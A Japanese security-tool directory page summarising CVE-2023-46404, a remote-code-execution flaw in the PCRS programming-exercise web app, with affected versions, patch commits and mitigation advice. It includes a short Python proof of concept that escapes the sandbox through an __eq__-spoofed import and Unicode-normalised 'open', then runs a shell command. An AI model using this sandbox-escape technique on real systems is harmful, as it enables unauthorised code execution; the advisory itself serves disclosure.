Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-46404 — PoC と解説 for CVE-2023-46404. | Kitploit
ツール/GitHubGitHub/windecks/cve-2023-46404
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHubwindecks/cve-2023-46404

CVE-2023-46404

PoC と解説 for CVE-2023-46404.

リポジトリを見る
32年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-46404

PCRS は、トロント大学で開発されたオンラインプログラミング演習のためのウェブアプリケーションです。 Bitbucket リポジトリ: https://bitbucket.org/utmandrew/pcrs/src/3.11/

概要

PCRS のコード提出機能を持つ「Questions」ページと「Code editor」ページは、Python サンドボックスをエスケープすることによりリモートコード実行 (RCE) に対して脆弱です。

詳細

PCRS インスタンスでは、ジェネレータオブジェクトを使用してリモートコード実行が可能です。ジェネレータフレーム (gi_frame) と f_back を使用することで、スクリプトはサンドボックス化されたスタックフレームから抜け出し、サンドボックス外の環境で悪意のあるコードを実行できます。さらに、Unicode 正規化によって基本的な入力サニタイズを簡単にバイパスできます。最小限の権限を持つ認証されたユーザーであれば誰でもこの攻撃を実行できます。詳細は PoC を参照してください。

既知の影響を受けるバージョン

  • Python 実行機能を備えた PCRS <= 3.11 d0de1e
  • パッチは 9326ad3 で実装され、部分的な緩和策は fbaedd3 で行われました。

緩和策

セキュアな隔離メカニズムをゼロから構築することは、見落としや脆弱性を生みやすいです。常に、言語よりも実行環境をサンドボックス化する方が良いでしょう。

追加情報

制限された環境では、__eq__ のオーバーライドが使用される可能性があります:

root@kitploit:~
def f():
    mod_name = "os"
    fake_name = "json"
    os = __import__(type("s", (str,), {"__eq__": lambda x, y: y == fake_name or y == mod_name, "__hash__": lambda x: hash(mod_name)})(mod_name))
    os.system("id > /tmp/test.txt")
    s = ᵒpen("/tmp/test.txt").read() # unicode normalization of the "open" function
    os.system("rm /tmp/test.txt")
    return s
ツールをダウンロード